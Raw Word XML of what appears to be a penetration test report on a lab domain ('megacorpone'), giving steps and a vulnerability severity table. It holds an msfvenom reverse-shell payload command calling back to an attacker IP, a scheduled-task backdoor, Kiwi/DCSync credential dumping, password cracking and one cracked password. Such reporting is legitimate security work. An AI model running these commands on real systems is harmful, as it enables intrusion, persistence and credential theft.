    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Shares are available on the machine: C$, IPC$, ADMIN$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MSFVenom: We were able to create a custom payload with msfvenom and run it on the de</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>signated host’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Go to home directory and run msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.22.117.100 LPORT=4444 -f exe &gt; shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Connect to remote system: smbclient //172.22.117.20/C$ -U megacorpone/tstark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Login and “put shell.exe” onto</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> the system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Match the handler module to match it to the payload settings using “set”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows Privilege Escalation:Escalate privileges from tstark’s login credentials to an administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run meterpreter and use background command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Use the windows/local/pers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>istence_service module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Set the parameters and run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Getuid (and rename file to something more stealthy)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Persistence: We used Task Scheduler so our Payload will run on certain times.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Open in meterpreter and run shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run schtasks /create /f /tn Backdoor /SC ONCE /ST 00:00 /TR "C:\shell.exe" so my payload will execute everyday at midnight.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Credential Dumping: We were able to load Kiwi in Meterpreter, collect credentials and run John the Ripper on the cached credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run kiwi_cmd lsadump::cache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Save the hashes in a txt file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Cat the txt fie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ran John the Ripper on the txt file and collected the passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We collected banners password - Winter2021</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Credential Spraying: We gained access to the domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Load Metas</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Fill the SMB Domain, User, Pass, and Rhosts with info we gathered from Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Lateral Movement: We gained access to the domain controller and moved from Windows10 to WINDC01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Load Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Fill the SMB Domain, User, Pass, an</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d Rhosts with info we gathered from Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Credential Access: We were able to crack more passwords in the NTDS file with John the Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Load Meterpreter and Kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>See users with “net users” and run “dcsync_ntlm” for each of the use</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Put all info into a txt file and run John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_nfhr1oobdzor" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Summary Vulnerability Overview</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tbl>
      <w:tblPr>
        <w:tblStyle w:val="a4"/>
        <w:tblW w:w="8857" w:type="dxa"/>
        <w:tblInd w:w="-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409"/>
        <w:gridCol w:w="1448"/>
      </w:tblGrid>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="294"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7409" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7409" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Weak password on public web application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7409" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Employee Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF9900"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="008000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7409" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Certificate and Domain Transparency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="9900FF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
